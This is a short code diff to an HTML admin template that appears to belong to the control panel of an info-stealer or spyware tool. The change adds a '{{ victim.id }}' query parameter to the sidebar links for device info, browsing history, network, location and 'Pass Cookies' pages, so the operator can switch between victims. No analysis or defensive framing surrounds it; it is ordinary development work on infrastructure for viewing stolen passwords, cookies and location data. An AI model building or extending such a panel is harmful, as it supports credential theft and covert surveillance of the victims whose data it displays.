--- a/admin/templates/history.html
+++ b/admin/templates/history.html
@@ -16,12 +16,12 @@
                 <h2>User 1</h2>
             </div>
             <nav class="sidebar-nav">
-                <a class="nav-item active" href="/overview">Overview</a>
-                <a class="nav-item" href="/device">Device Info</a>
-                <a class="nav-item" href="/history">History</a>
-                <a class="nav-item" href="/network">Network</a>
-                <a class="nav-item" href="/location">Location</a>
-                <a class="nav-item" href="/passcookies">Pass Cookies</a>
+                <a class="nav-item active" href="/overview?id={{ victim.id }}">Overview</a>
+                <a class="nav-item" href="/device?id={{ victim.id }}">Device Info</a>
+                <a class="nav-item" href="/history?id={{ victim.id }}">History</a>
+                <a class="nav-item" href="/network?id={{ victim.id }}">Network</a>
+                <a class="nav-item" href="/location?id={{ victim.id }}">Location</a>
+                <a class="nav-item" href="/passcookies?id={{ victim.id }}">Pass Cookies</a>
             </nav>
             <div class="logout-section">
                 <a href="/logout" class="logout-btn">
